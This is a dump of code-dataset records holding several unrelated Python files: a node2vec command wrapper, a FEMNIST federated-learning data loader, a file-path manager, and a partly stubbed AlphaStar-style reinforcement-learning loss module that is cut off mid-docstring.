shell_util.run(\"make -j 3 html\")\n\n if rc != 0:\n print(\"build may have been unsuccessful\")\n\n index = os.path.join(build_dir, \"build/html/index.html\")\n\n # use webbrowser module\n if show == 1:\n webbrowser.open_new_tab(index)\n","repo_name":"zingale/pyjournal2","sub_path":"pyjournal2/build_util.py","file_name":"build_util.py","file_ext":"py","file_size_in_byte":7117,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24115039272","text":"import settings\r\nimport const\r\nimport os\r\nimport re\r\nimport subprocess\r\nfrom src.methods.node2vec import Node2Vec\r\nimport networkx\r\n\r\ndef graph_load(path, is_directed=False):\r\n graph_type = networkx.DiGraph() if is_directed else networkx.Graph()\r\n graph = networkx.readwrite.edgelist.read_weighted_edgelist(path, create_using=graph_type)\r\n return graph\r\n\r\ndef embed_py(graph_path, output_path, is_windows=True, is_directed=False, dimension=20, walk_length=60, nb_of_walk_per_srouce = 12, window_size = 5):\r\n graph = graph_load(graph_path, is_directed)\r\n node2vec = Node2Vec(graph, dimension, walk_length, nb_of_walk_per_srouce, workers=1)\r\n model = node2vec.fit(window=window_size, min_count=1, batch_words=4)\r\n model.wv.save_word2vec_format(output_path)\r\n\r\ndef embed_cpp(graph_path, output_path, is_windows=True, is_directed=False, dimension=20, walk_length=60, nb_of_walk_per_srouce = 12, p=1, q=1):\r\n # node2vec -i:graph/karate.edgelist -o:emb/karate.emb -l:3 -d:24 -p:0.3 -dr -v\r\n node2vec_path = settings.config[const.NODE_TO_VEC]\r\n command_list = [win_to_cygwin(node2vec_path) if is_windows else node2vec_path,\r\n '-i:' + win_to_cygwin(graph_path) if is_windows else graph_path,\r\n '-o:' + win_to_cygwin(output_path) if is_windows else output_path,\r\n '-d:%d' % dimension,\r\n '-p:%f' % p, '-q:%f' % q, '-l:%d' % walk_length, '-r:%d' % nb_of_walk_per_srouce , '-w', '-v']\r\n if is_directed:\r\n command_list.append(\"-dr\")\r\n command = \" \".join(command_list)\r\n if is_windows:\r\n # Call the configured shell from windows cmd to run node2vec.exe\r\n command = \"%s -l -c \\\"%s\\\"\" % (settings.config[const.SHELL], command)\r\n print('Execute: %s' % command)\r\n p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\r\n for line in p.stdout.readlines():\r\n print(line)\r\n return p.wait()\r\n\r\ndef win_to_cygwin(path: str):\r\n return \"/cygdrive/\" + path[0:1].lower() + path[2:].replace(\"\\\\\", \"/\")\r\n\r\nif __name__ == '__main__':\r\n embed_cpp(graph_path=settings.config[const.SLASHDOT_3TYPE_TRAIN],\r\n output_path=settings.config[const.SLASHDOT_3TYPE_OUTPUT],\r\n is_directed=False)\r\n embed_cpp(graph_path=settings.config[const.SLASHDOT_UNSIGNED_TRAIN],\r\n output_path=settings.config[const.SLASHDOT_UNSIGNED_OUTPUT],\r\n is_directed=False)\r\n","repo_name":"AminJavari/ROSE","sub_path":"src/methods/mynode2vec.py","file_name":"mynode2vec.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7283276122","text":"\"\"\"FEMNIST dataset creation module.\"\"\"\n\n\nimport pathlib\nfrom logging import INFO\nfrom typing import List, Tuple\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torchvision.transforms as transforms\nfrom flwr.common.logger import log\nfrom PIL import Image\nfrom sklearn import preprocessing\nfrom torch.utils.data import DataLoader, Dataset, Subset, random_split\n\nfrom flwr_baselines.publications.leaf.femnist.dataset.nist_preprocessor import (\n NISTPreprocessor,\n)\nfrom flwr_baselines.publications.leaf.femnist.dataset.nist_sampler import NistSampler\nfrom flwr_baselines.publications.leaf.femnist.dataset.zip_downloader import (\n ZipDownloader,\n)\n\n\nclass NISTLikeDataset(Dataset):\n \"\"\"Dataset representing NIST or preprocessed variant of it.\"\"\"\n\n def __init__(\n self,\n image_paths: List[pathlib.Path],\n labels: np.ndarray,\n transform: transforms = transforms.ToTensor(),\n ) -> None:\n self.image_paths = image_paths\n self.labels = labels\n self.transform = transforms.ToTensor() if transform is None else transform\n\n def __len__(self) -> int:\n return len(self.image_paths)\n\n def __getitem__(self, index: int) -> Tuple[torch.Tensor, torch.Tensor]:\n image_path = self.image_paths[index]\n label = self.labels[index]\n image = Image.open(image_path)\n if self.transform:\n image = self.transform(image)\n label = torch.tensor(label)\n return image, label\n\n\ndef create_dataset(df_info: pd.DataFrame, labels: np.ndarray) -> NISTLikeDataset:\n \"\"\"Instantiate NISTLikeDataset.\n\n Parameters\n ----------\n df_info: pd.DataFrame\n contains paths to images\n labels: np.ndarray\n 0 till N-1 classes labels in the same order as in df_info\n\n Returns\n -------\n nist_like_dataset: NISTLikeDataset\n created dataset\n \"\"\"\n nist_like_dataset = NISTLikeDataset(df_info[\"path\"].values, labels)\n return nist_like_dataset\n\n\ndef create_partition_list(df_info: pd.DataFrame) -> List[List[int]]:\n \"\"\"\n Create list of list with int masks identifying writers.\n Parameters\n ----------\n df_info: pd.DataFrame\n contains writer_id information\n\n Returns\n -------\n division_list: List[List[int]]\n List of lists of indices to identify unique writers\n \"\"\"\n writers_ids = df_info[\"writer_id\"].values\n unique_writers = np.unique(writers_ids)\n indices = {\n writer_id: np.where(writers_ids == writer_id)[0].tolist()\n for writer_id in unique_writers\n }\n return list(indices.values())\n\n\ndef partition_dataset(\n dataset: Dataset, division_list: List[List[int]]\n) -> List[Dataset]:\n \"\"\"\n Partition dataset for niid settings - by writer id (each partition has only single writer data).\n Parameters\n ----------\n dataset: Dataset\n dataset of all images\n division_list: List[List[int]]\n list of lists of indices to identify unique writers\n\n Returns\n -------\n subsets: List[Dataset]\n subsets of datasets divided by writer id\n \"\"\"\n subsets = []\n for sequence in division_list:\n subsets.append(Subset(dataset, sequence))\n return subsets\n\n\n# pylint: disable=too-many-locals\ndef train_valid_test_partition(\n partitioned_dataset: List[Dataset],\n train_split: float = 0.9,\n validation_split: float = 0.0,\n test_split: float = 0.1,\n random_seed: int = None,\n) -> Tuple[List[Dataset], List[Dataset], List[Dataset]]:\n \"\"\"Partition list of datasets to train, validation and test splits (each\n dataset from the list individually).\n\n Parameters\n ----------\n partitioned_dataset: List[Dataset]\n partitioned datasets\n train_split: float\n part of the data used for training\n validation_split: float\n part of the data used for validation\n test_split: float\n part of the data used for testing\n random_seed: int\n seed for data splitting\n\n Returns\n -------\n (train, validation, test): Tuple[List[Dataset], List[Dataset], List[Dataset]]\n split datasets\n \"\"\"\n train_subsets = []\n validation_subsets = []\n test_subsets = []\n\n for subset in partitioned_dataset:\n subset_len = len(subset)\n train_len = int(train_split * subset_len)\n # Do this checkup for full dataset use\n # Consider the case sample size == 5 and\n # train_split = 0.5 test_split = 0.5\n # if such check as below is not performed\n # one sample will be missing\n if validation_split == 0.0:\n test_len = subset_len - train_len\n val_len = 0\n else:\n test_len = int(test_split * subset_len)\n val_len = subset_len - train_len - test_len\n train_dataset, validation_dataset, test_dataset = random_split(\n subset,\n lengths=[train_len, val_len, test_len],\n generator=torch.Generator().manual_seed(random_seed),\n )\n train_subsets.append(train_dataset)\n validation_subsets.append(validation_dataset)\n test_subsets.append(test_dataset)\n return train_subsets, validation_subsets, test_subsets\n\n\ndef transform_datasets_into_dataloaders(\n datasets: List[Dataset], **dataloader_kwargs\n) -> List[DataLoader]:\n \"\"\"\n Transform datasets into dataloaders.\n Parameters\n ----------\n datasets: List[Dataset]\n list of datasets\n dataloader_kwargs\n arguments to DataLoader\n\n Returns\n -------\n dataloader: List[DataLoader]\n list of dataloaders\n \"\"\"\n dataloaders = []\n for dataset in datasets:\n dataloaders.append(DataLoader(dataset, **dataloader_kwargs))\n return dataloaders\n\n\n# pylint: disable=too-many-arguments\ndef create_federated_dataloaders(\n sampling_type: str,\n dataset_fraction: float,\n batch_size: int,\n train_fraction: float,\n validation_fraction: float,\n test_fraction: float,\n random_seed: int,\n) -> Tuple[List[DataLoader], List[DataLoader], List[DataLoader]]:\n \"\"\"Create the federated dataloaders by following all the preprocessing\n steps and division.\n\n Parameters\n ----------\n sampling_type: str\n \"niid\" or \"iid\"\n dataset_fraction: float\n fraction of the total data that will be used for sampling\n batch_size: int\n batch size\n train_fraction, validation_fraction, test_fraction: float\n fraction of each local dataset used for training, validation, testing\n random_seed: int\n random seed for data shuffling\n\n Returns\n -------\n \"\"\"\n if train_fraction + validation_fraction + test_fraction != 1.0:\n raise ValueError(\n \"The fraction of train, validation and test should add up to 1.0.\"\n )\n # Download and unzip the data\n log(INFO, \"NIST data downloading started\")\n nist_by_class_url = \"https://s3.amazonaws.com/nist-srd/SD19/by_class.zip\"\n nist_by_writer_url = \"https://s3.amazonaws.com/nist-srd/SD19/by_write.zip\"\n nist_by_class_downloader = ZipDownloader(\"by_class\", \"data/raw\", nist_by_class_url)\n nist_by_writer_downloader = ZipDownloader(\n \"by_write\", \"data/raw\", nist_by_writer_url\n )\n nist_by_class_downloader.download()\n nist_by_writer_downloader.download()\n log(INFO, \"NIST data downloading done\")\n\n # Preprocess the data\n log(INFO, \"Preprocessing of the NIST data started\")\n nist_data_path = pathlib.Path(\"data\")\n nist_preprocessor = NISTPreprocessor(nist_data_path)\n nist_preprocessor.preprocess()\n log(INFO, \"Preprocessing of the NIST data done\")\n\n # Create information for sampling\n log(INFO, \"Creation of the sampling information started\")\n df_info_path = pathlib.Path(\"data/processed_FeMNIST/processed_images_to_labels.csv\")\n df_info = pd.read_csv(df_info_path, index_col=0)\n sampler = NistSampler(df_info)\n sampled_data_info = sampler.sample(\n sampling_type, dataset_fraction, random_seed=random_seed\n )\n sampled_data_info_path = pathlib.Path(\n f\"data/processed_FeMNIST/{sampling_type}_sampled_images_to_labels.csv\"\n )\n sampled_data_info.to_csv(sampled_data_info_path)\n log(INFO, \"Creation of the sampling information done\")\n\n # Create a list of DataLoaders\n log(INFO, \"Creation of the partitioned by writer_id PyTorch Datasets started\")\n sampled_data_info = pd.read_csv(sampled_data_info_path)\n label_encoder = preprocessing.LabelEncoder()\n labels = label_encoder.fit_transform(sampled_data_info[\"character\"])\n full_dataset = create_dataset(sampled_data_info, labels)\n division_list = create_partition_list(sampled_data_info)\n partitioned_dataset = partition_dataset(full_dataset, division_list)\n (\n partitioned_train,\n partitioned_validation,\n partitioned_test,\n ) = train_valid_test_partition(\n partitioned_dataset,\n random_seed=random_seed,\n train_split=train_fraction,\n validation_split=validation_fraction,\n test_split=test_fraction,\n )\n trainloaders = transform_datasets_into_dataloaders(\n partitioned_train, batch_size=batch_size\n )\n valloaders = transform_datasets_into_dataloaders(\n partitioned_validation, batch_size=batch_size\n )\n testloaders = transform_datasets_into_dataloaders(\n partitioned_test, batch_size=batch_size\n )\n log(INFO, \"Creation of the partitioned by writer_id PyTorch Datasets done\")\n return trainloaders, valloaders, testloaders\n","repo_name":"adap/flower","sub_path":"baselines/flwr_baselines/flwr_baselines/publications/leaf/femnist/dataset/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":9487,"program_lang":"python","lang":"en","doc_type":"code","stars":3287,"dataset":"github-code","pt":"61"} +{"seq_id":"1857688755","text":"import os\nimport time\nfrom enum import Enum, unique\nfrom typing import Any\n\nfrom utils.objectIO import pickle_mkdir_save, pickle_load, touch_file, create_path\n\n# 待实现优化\n# 将milestone内容迁移到checkpoint对应模型下\n# checkout 当目录不存在时创建\n# 对象的序列化与反序列化实现\nsimp_time_stamp_index1 = 5\nsimp_time_stamp_index2 = 10\nst3 = 11\nst4 = 14\nst5 = 17\n\n\n@unique\nclass FileType(Enum):\n # MODEL_TYPE = '.pt'\n # CONFIG_TYPE = '.yml'\n IMG_TYPE = '.png'\n LOG_TYPE = '.log'\n EXP_TYPE = '.txt'\n SEQ_TYPE = '.seq'\n CHECKPOINT_TYPE = '.snap'\n\n\ndef curt_time_stamp(simp: bool = False):\n pattern = '%Y.%m.%d_%H-%M-%S'\n time_str = time.strftime(pattern, time.localtime(time.time()))\n if simp:\n return time_str[simp_time_stamp_index1: simp_time_stamp_index2]\n else:\n return time_str\n\n\ndef only_time_stamp():\n pattern = '%Y.%m.%d_%H-%M-%S'\n time_str = time.strftime(pattern, time.localtime(time.time()))\n return time_str[st3: st3 + 2] + time_str[st4: st4 + 2] + time_str[st5: st5 + 2]\n\n\ndef file_name(file_type: FileType, name: str = None, ext_time: bool = True) -> str:\n if name is None:\n return f\"{curt_time_stamp()}{file_type.value}\"\n else:\n if ext_time:\n return f\"{name}_{only_time_stamp()}---{curt_time_stamp(ext_time)}{file_type.value}\"\n else:\n return f\"{name}{file_type.value}\"\n\n\nclass PathManager:\n ERROR_MESS1 = \"Given directory doesn't exists.\"\n ERROR_MESS2 = \"Given key doesn't exists.\"\n\n def __init__(self, model_path: str, dataset_path: str):\n self.model_path: str = model_path\n self.dataset_path: str = dataset_path\n\n self.image_path = None\n self.mile_path = None\n self.log_path = None\n self.exp_path = None\n self.checkpoint_path = None\n\n self.curt_id = 0\n self.reg_path = []\n\n @staticmethod\n def load(path: str) -> Any:\n return pickle_load(path)\n\n @staticmethod\n def store(obj: Any, path: str):\n pickle_mkdir_save(obj, path)\n\n def derive_path(self, exp_base: str, image_base: str, milestone_base: str, log_base: str):\n path_base, file = os.path.split(self.model_path)\n _file_name, file_postfix = os.path.splitext(file)\n self.image_path = os.path.join(image_base, _file_name)\n self.mile_path = os.path.join(milestone_base, _file_name)\n self.log_path = os.path.join(log_base, _file_name)\n self.exp_path = os.path.join(exp_base, _file_name)\n self.checkpoint_path = path_base\n\n def fetch_path(self, path_id: int) -> str:\n return self.reg_path[path_id]\n\n def is_new(self, new: str) -> bool:\n for path in self.reg_path:\n if path == new:\n return False\n return True\n\n def sync_path(self, path: str) -> int:\n create_path(path)\n if self.is_new(path):\n self.reg_path.append(path)\n self.curt_id += 1\n ret = self.reg_path.index(path)\n return ret\n\n def latest_path(self) -> str:\n return self.fetch_path(self.curt_id - 1)\n\n def new_log(self, name: str = None) -> (str, int):\n new_file = os.path.join(self.log_path, file_name(FileType.LOG_TYPE, name))\n touch_file(new_file)\n file_id = self.sync_path(new_file)\n return new_file, file_id\n\n def new_img(self, name: str = None) -> (str, int):\n new_file = os.path.join(self.image_path, file_name(FileType.IMG_TYPE, name))\n file_id = self.sync_path(new_file)\n return new_file, file_id\n\n def new_checkpoint(self, name: str = None, fixed: bool = False) -> (str, int):\n new_file = os.path.join(self.checkpoint_path,\n file_name(FileType.CHECKPOINT_TYPE, name, not fixed))\n file_id = self.sync_path(new_file)\n return new_file, file_id\n\n def new_exp(self, name: str = None) -> (str, int):\n new_file = os.path.join(self.exp_path, file_name(FileType.EXP_TYPE, name))\n file_id = self.sync_path(new_file)\n return new_file, file_id\n\n def new_seq(self, name: str = None) -> (str, int):\n new_file = os.path.join(self.mile_path, file_name(FileType.SEQ_TYPE, name))\n file_id = self.sync_path(new_file)\n return new_file, file_id\n","repo_name":"Wolfsion/FedLA","sub_path":"utils/PathManager.py","file_name":"PathManager.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23272767866","text":"\"\"\"Library for RL losses.\"\"\"\nimport collections\n\nimport numpy as np\n\n\nOBSERVATION_FIELDS = [\n 'game_seconds', # Game timer in seconds.\n]\n\nACTION_FIELDS = [\n 'action_type', # Action taken.\n # Other fields, e.g. arguments, repeat, delay, queued.\n]\n\nTRAJECTORY_FIELDS = [\n 'observation', # Player observation.\n 'opponent_observation', # Opponent observation, used for value network.\n 'state', # State of the agent (used for initial LSTM state).\n 'z', # Conditioning information for the policy.\n 'is_final', # If this is the last step.\n # namedtuple of masks for each action component. 0/False if final_step of\n # trajectory, or the argument is not used; else 1/True.\n 'masks',\n 'action', # Action taken by the agent.\n 'behavior_logits', # namedtuple of logits of the behavior policy.\n 'teacher_logits', # namedtuple of logits of the supervised policy.\n 'reward', # Reward for the agent after taking the step.\n]\n\nTrajectory = collections.namedtuple('Trajectory', TRAJECTORY_FIELDS)\n\n\ndef log_prob(actions, logits):\n \"\"\"Returns the log probability of taking an action given the logits.\"\"\"\n # Equivalent to tf.sparse_softmax_cross_entropy_with_logits.\n\n\ndef is_sampled(z):\n \"\"\"Takes a tensor of zs. Returns a mask indicating which z's are sampled.\"\"\"\n\n\ndef filter_by(action_fields, target):\n \"\"\"Returns the subset of `target` corresponding to `action_fields`.\n\n Autoregressive actions are composed of many logits. We often want to select a\n subset of these logits.\n\n Args:\n action_fields: One of 'action_type', 'delay', or 'arguments'.\n target: A list of tensors corresponding to the SC2 action spec.\n Returns:\n A list corresponding to a subset of `target`, with only the tensors relevant\n to `action_fields`.\n \"\"\"\n\n\ndef compute_over_actions(f, *args):\n \"\"\"Runs f over all elements in the lists composing *args.\n\n Autoregressive actions are composed of many logits. We run losses functions\n over all sets of logits.\n \"\"\"\n return sum(f(*a) for a in zip(*args))\n\n\ndef entropy(policy_logits):\n policy = softmax(policy_logits)\n log_policy = logsoftmax(policy_logits)\n ent = np.sum(-policy * log_policy, axis=-1) # Aggregate over actions.\n # Normalize by actions available.\n normalized_entropy = ent / np.log(policy_logits.shape[-1])\n return normalized_entropy\n\n\ndef entropy_loss(policy_logits, masks):\n \"\"\"Computes the entropy loss for a set of logits.\n\n Args:\n policy_logits: namedtuple of the logits for each policy argument.\n Each shape is [..., N_i].\n masks: The masks. Each shape is policy_logits.shape[:-1].\n Returns:\n Per-example entropy loss, as an array of shape policy_logits.shape[:-1].\n \"\"\"\n return np.mean(compute_over_actions(entropy, policy_logits, masks))\n\n\ndef kl(student_logits, teacher_logits, mask):\n s_logprobs = logsoftmax(student_logits)\n t_logprobs = logsoftmax(teacher_logits)\n teacher_probs = softmax(teacher_logits)\n return teacher_probs * (t_logprobs - s_logprobs) * mask\n\n\ndef human_policy_kl_loss(trajectories, kl_cost, action_type_kl_cost):\n \"\"\"Computes the KL loss to the human policy.\n\n Args:\n trajectories: The trajectories.\n kl_cost: A float; the weighting to apply to the KL cost to the human policy.\n action_type_kl_cost: Additional cost applied to action_types for\n conditioned policies.\n Returns:\n Per-example entropy loss, as an array of shape policy_logits.shape[:-1].\n \"\"\"\n student_logits = trajectories.behavior_logits\n teacher_logits = trajectories.teacher_logits\n masks = trajectories.masks\n kl_loss = compute_over_actions(kl, student_logits, teacher_logits, masks)\n\n # We add an additional KL-loss on only the action_type for the first 4 minutes\n # of each game if z is sampled.\n game_seconds = trajectories.observation.game_seconds\n action_type_mask = masks.action_type & (game_seconds > 4 * 60)\n action_type_mask = action_type_mask & is_sampled(trajectories.z)\n action_type_loss = kl(student_logits.action_type, teacher_logits.action_type,\n action_type_mask)\n return (kl_cost * np.mean(kl_loss)\n + action_type_kl_cost * np.mean(action_type_loss))\n\n\ndef lambda_returns(values_tp1, rewards, discounts, lambdas):\n \"\"\"Computes lambda returns.\n\n Refer to the following for a similar function:\n https://github.com/deepmind/trfl/blob/2c07ac22512a16715cc759f0072be43a5d12ae45/trfl/value_ops.py#L74\n \"\"\"\n\n\ndef generalized_lambda_returns(rewards,\n pcontinues,\n values,\n bootstrap_value,\n lambda_=1,\n name=\"generalized_lambda_returns\"):\n \"\"\"Computes lambda-returns along a batch of (chunks of) trajectories.\n For lambda=1 these will be multistep returns looking ahead from each\n state to the end of the chunk, where bootstrap_value is used. If you pass an\n entire trajectory and zeros for bootstrap_value, this is just the Monte-Carlo\n return / TD(1) target.\n For lambda=0 these are one-step TD(0) targets.\n For inbetween values of lambda these are lambda-returns / TD(lambda) targets,\n except that traces are always cut off at the end of the chunk, since we can't\n see returns beyond then. If you pass an entire trajectory with zeros for\n bootstrap_value though, then they're plain TD(lambda) targets.\n lambda can also be a tensor of values in [0, 1], determining the mix of\n bootstrapping vs further accumulation of multistep returns at each timestep.\n This can be used to implement Retrace and other algorithms. See\n `sequence_ops.multistep_forward_view` for more info on this. Another way to\n think about the end-of-chunk cutoff is that lambda is always effectively zero\n on the timestep after the end of the chunk, since at the end of the chunk we\n rely entirely on bootstrapping and can't accumulate returns looking further\n into the future.\n The sequences in the tensors should be aligned such that an agent in a state\n with value `V` transitions into another state with value `V'`, receiving\n reward `r` and pcontinue `p`. Then `V`, `r` and `p` are all at the same index\n `i` in the corresponding tensors. `V'` is at index `i+1`, or in the\n `bootstrap_value` tensor if `i == T`.\n Subtracting `values` from these lambda-returns will yield estimates of the\n advantage function which can be used for both the policy gradient loss and\n the baseline value function loss in A3C / GAE.\n Args:\n rewards: 2-D Tensor with shape `[T, B]`.\n pcontinues: 2-D Tensor with shape `[T, B]`.\n values: 2-D Tensor containing estimates of the state values for timesteps\n 0 to `T-1`. Shape `[T, B]`.\n bootstrap_value: 1-D Tensor containing an estimate of the value of the\n final state at time `T`, used for bootstrapping the target n-step\n returns. Shape `[B]`.\n lambda_: an optional scalar or 2-D Tensor with shape `[T, B]`.\n name: Customises the name_scope for this op.\n Returns:\n 2-D Tensor with shape `[T, B]`\n \"\"\"\n values.get_shape().assert_has_rank(2)\n rewards.get_shape().assert_has_rank(2)\n pcontinues.get_shape().assert_has_rank(2)\n bootstrap_value.get_shape().assert_has_rank(1)\n scoped_values = [rewards, pcontinues, values, bootstrap_value, lambda_]\n with tf.name_scope(name, values=scoped_values):\n if lambda_ == 1:\n # This is actually equivalent to the branch below, just an optimisation\n # to avoid unnecessary work in this case:\n return sequence_ops.scan_discounted_sum(\n rewards,\n pcontinues,\n initial_value=bootstrap_value,\n reverse=True,\n back_prop=False,\n name=\"multistep_returns\")\n else:\n v_tp1 = tf.concat(\n axis=0, values=[values[1:, :],\n tf.expand_dims(bootstrap_value, 0)])\n # `back_prop=False` prevents gradients flowing into values and\n # bootstrap_value, which is what you want when using the bootstrapped\n # lambda-returns in an update as targets for values.\n return sequence_ops.multistep_forward_view(\n rewards,\n pcontinues,\n v_tp1,\n lambda_,\n back_prop=False,\n name=\"generalized_lambda_returns\")\n\n\ndef vtrace_advantages(clipped_rhos, rewards, discounts, values, bootstrap_value):\n \"\"\"Computes v-trace return advantages.\n\n Refer to the following for a similar function:\n https://github.com/deepmind/trfl/blob/40884d4bb39f99e4a642acdbe26113914ad0acec/trfl/vtrace_ops.py#L154\n \"\"\"\n\n\ndef vtrace_from_importance_weights(\n log_rhos, discounts, rewards, values, bootstrap_value,\n clip_rho_threshold=1.0, clip_pg_rho_threshold=1.0,\n name='vtrace_from_importance_weights'):\n r\"\"\"V-trace from log importance weights.\n Calculates V-trace actor critic targets as described in\n \"IMPALA: Scalable Distributed Deep-RL with\n Importance Weighted Actor-Learner Architectures\"\n by Espeholt, Soyer, Munos et al.\n In the notation used throughout documentation and comments, T refers to the\n time dimension ranging from 0 to T-1. B refers to the batch size and\n NUM_ACTIONS refers to the number of actions. This code also supports the\n case where all tensors have the same number of additional dimensions, e.g.,\n `rewards` is `[T, B, C]`, `values` is `[T, B, C]`, `bootstrap_value`\n is `[B, C]`.\n Args:\n log_rhos: A float32 tensor of shape `[T, B, NUM_ACTIONS]` representing the\n log importance sampling weights, i.e.\n log(target_policy(a) / behaviour_policy(a)). V-trace performs operations\n on rhos in log-space for numerical stability.\n discounts: A float32 tensor of shape `[T, B]` with discounts encountered\n when following the behaviour policy.\n rewards: A float32 tensor of shape `[T, B]` containing rewards generated by\n following the behaviour policy.\n values: A float32 tensor of shape `[T, B]` with the value function estimates\n wrt. the target policy.\n bootstrap_value: A float32 of shape `[B]` with the value function estimate\n at time T.\n clip_rho_threshold: A scalar float32 tensor with the clipping threshold for\n importance weights (rho) when calculating the baseline targets (vs).\n rho^bar in the paper. If None, no clipping is applied.\n clip_pg_rho_threshold: A scalar float32 tensor with the clipping threshold\n on rho_s in \\rho_s \\delta log \\pi(a|x) (r + \\gamma v_{s+1} - V(x_s)). If\n None, no clipping is applied.\n name: The name scope that all V-trace operations will be created in.\n Returns:\n A VTraceReturns namedtuple (vs, pg_advantages) where:\n vs: A float32 tensor of shape `[T, B]`. Can be used as target to\n train a baseline (V(x_t) - vs_t)^2.\n pg_advantages: A float32 tensor of shape `[T, B]`. Can be used as the\n advantage in the calculation of policy gradients.\n \"\"\"\n log_rhos = tf.convert_to_tensor(log_rhos, dtype=tf.float32)\n discounts = tf.convert_to_tensor(discounts, dtype=tf.float32)\n rewards = tf.convert_to_tensor(rewards, dtype=tf.float32)\n values = tf.convert_to_tensor(values, dtype=tf.float32)\n bootstrap_value = tf.convert_to_tensor(bootstrap_value, dtype=tf.float32)\n if clip_rho_threshold is not None:\n clip_rho_threshold = tf.convert_to_tensor(clip_rho_threshold,\n dtype=tf.float32)\n if clip_pg_rho_threshold is not None:\n clip_pg_rho_threshold = tf.convert_to_tensor(clip_pg_rho_threshold,\n dtype=tf.float32)\n\n # Make sure tensor ranks are consistent.\n rho_rank = log_rhos.shape.ndims # Usually 2.\n values.shape.assert_has_rank(rho_rank)\n bootstrap_value.shape.assert_has_rank(rho_rank - 1)\n discounts.shape.assert_has_rank(rho_rank)\n rewards.shape.assert_has_rank(rho_rank)\n if clip_rho_threshold is not None:\n clip_rho_threshold.shape.assert_has_rank(0)\n if clip_pg_rho_threshold is not None:\n clip_pg_rho_threshold.shape.assert_has_rank(0)\n\n with tf.name_scope(name, values=[\n log_rhos, discounts, rewards, values, bootstrap_value]):\n rhos = tf.exp(log_rhos)\n if clip_rho_threshold is not None:\n clipped_rhos = tf.minimum(clip_rho_threshold, rhos, name='clipped_rhos')\n else:\n clipped_rhos = rhos\n\n cs = tf.minimum(1.0, rhos, name='cs')\n # Append bootstrapped value to get [v1, ..., v_t+1]\n values_t_plus_1 = tf.concat(\n [values[1:], tf.expand_dims(bootstrap_value, 0)], axis=0)\n deltas = clipped_rhos * (rewards + discounts * values_t_plus_1 - values)\n\n # Note that all sequences are reversed, computation starts from the back.\n sequences = (\n tf.reverse(discounts, axis=[0]),\n tf.reverse(cs, axis=[0]),\n tf.reverse(deltas, axis=[0]),\n )\n # V-trace vs are calculated through a scan from the back to the beginning\n # of the given trajectory.\n\n def scanfunc(acc, sequence_item):\n discount_t, c_t, delta_t = sequence_item\n return delta_t + discount_t * c_t * acc\n\n initial_values = tf.zeros_like(bootstrap_value)\n vs_minus_v_xs = tf.scan(\n fn=scanfunc,\n elems=sequences,\n initializer=initial_values,\n parallel_iterations=1,\n back_prop=False,\n name='scan')\n # Reverse the results back to original order.\n vs_minus_v_xs = tf.reverse(vs_minus_v_xs, [0], name='vs_minus_v_xs')\n\n # Add V(x_s) to get v_s.\n vs = tf.add(vs_minus_v_xs, values, name='vs')\n\n # Advantage for policy gradient.\n vs_t_plus_1 = tf.concat([\n vs[1:], tf.expand_dims(bootstrap_value, 0)], axis=0)\n if clip_pg_rho_threshold is not None:\n clipped_pg_rhos = tf.minimum(clip_pg_rho_threshold, rhos,\n name='clipped_pg_rhos')\n else:\n clipped_pg_rhos = rhos\n pg_advantages = (\n clipped_pg_rhos * (rewards + discounts * vs_t_plus_1 - values))\n\n # Make sure no gradients backpropagated through the returned values.\n return VTraceReturns(vs=tf.stop_gradient(vs),\n pg_advantages=tf.stop_gradient(pg_advantages))\n\n\ndef td_lambda_loss(baselines, rewards, trajectories):\n discounts = ~trajectories.is_final[:-1]\n returns = lambda_returns(baselines[1:], rewards, discounts, lambdas=0.8)\n returns = stop_gradient(returns)\n return 0.5 * np.mean(np.square(returns - baselines[:-1]))\n\n\ndef policy_gradient_loss(logits, actions, advantages, mask):\n \"\"\"Helper function for computing policy gradient loss for UPGO and v-trace.\"\"\"\n action_log_prob = log_prob(actions, logits)\n advantages = stop_gradient(advantages)\n return mask * advantages * action_log_prob\n\n\ndef compute_unclipped_logrho(behavior_logits, target_logits, actions):\n \"\"\"Helper function for compute_importance_weights.\"\"\"\n return log_prob(actions, target_logits) - log_prob(actions, behavior_logits)\n\n\ndef compute_importance_weights(behavior_logits, target_logits, actions):\n \"\"\"Computes clipped importance weights.\"\"\"\n logrho = compute_over_actions(compute_unclipped_logrho, behavior_logits,\n target_logits, actions)\n return np.minimum(1., np.exp(logrho))\n\n\ndef vtrace_pg_loss(target_logits, baselines, rewards, trajectories,\n action_fields):\n \"\"\"Computes v-trace policy gradient loss. Helper for split_vtrace_pg_loss.\"\"\"\n # Remove last timestep from trajectories and baselines.\n trajectories = Trajectory(*tuple(t[:-1] for t in trajectories))\n rewards = rewards[:-1]\n values = baselines[:-1]\n\n # Filter for only the relevant actions/logits/masks.\n target_logits = filter_by(action_fields, target_logits)\n behavior_logits = filter_by(action_fields, trajectories.behavior_logits)\n actions = filter_by(action_fields, trajectories.actions)\n masks = filter_by(action_fields, trajectories.masks)\n\n # Compute and return the v-trace policy gradient loss for the relevant subset\n # of logits.\n clipped_rhos = compute_importance_weights(behavior_logits, target_logits,\n actions)\n weighted_advantage = vtrace_advantages(clipped_rhos, rewards,\n trajectories.discounts, values,\n baselines[-1])\n weighted_advantage = [weighted_advantage] * len(target_logits)\n return compute_over_actions(policy_gradient_loss, target_logits,\n actions, weighted_advantage, masks)\n\n\ndef split_vtrace_pg_loss(target_logits, baselines, rewards, trajectories):\n \"\"\"Computes the split v-trace policy gradient loss.\n\n We compute the policy loss (and therefore update, via autodiff) separately for\n the action_type, delay, and arguments. Each of these component losses are\n weighted equally.\n \"\"\"\n loss = 0.\n loss += vtrace_pg_loss(target_logits, baselines, rewards, trajectories,\n 'action_type')\n loss += vtrace_pg_loss(target_logits, baselines, rewards, trajectories,\n 'delay')\n loss += vtrace_pg_loss(target_logits, baselines, rewards, trajectories,\n 'arguments')\n return loss\n\n\ndef upgo_returns(values, rewards, discounts, bootstrap):\n \"\"\"Computes the UPGO return targets.\n\n Args:\n values: Estimated state values. Shape [T, B].\n rewards: Rewards received moving to the next state. Shape 